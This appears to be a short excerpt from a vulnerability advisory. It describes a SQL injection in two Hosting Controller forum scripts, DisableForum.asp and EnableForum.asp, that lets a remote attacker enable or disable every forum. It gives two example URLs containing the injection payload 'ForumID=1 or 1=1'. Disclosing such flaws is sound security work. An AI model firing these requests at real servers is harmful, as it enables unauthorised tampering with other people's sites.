14- [Remote Attacker] can enable or disable all Hosting Controller forums by SQL Injection.
 14.1- This is because of a SQL Injection in "/forum/HCSpecific/DisableForum.asp" and "/forum/HCSpecific/EnableForum.asp"
     "http://[HC URL]//forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1"
  "http://[HC URL]//forum/HCSpecific/EnableForum.asp?action=disableforum&ForumID=1 or 1=1"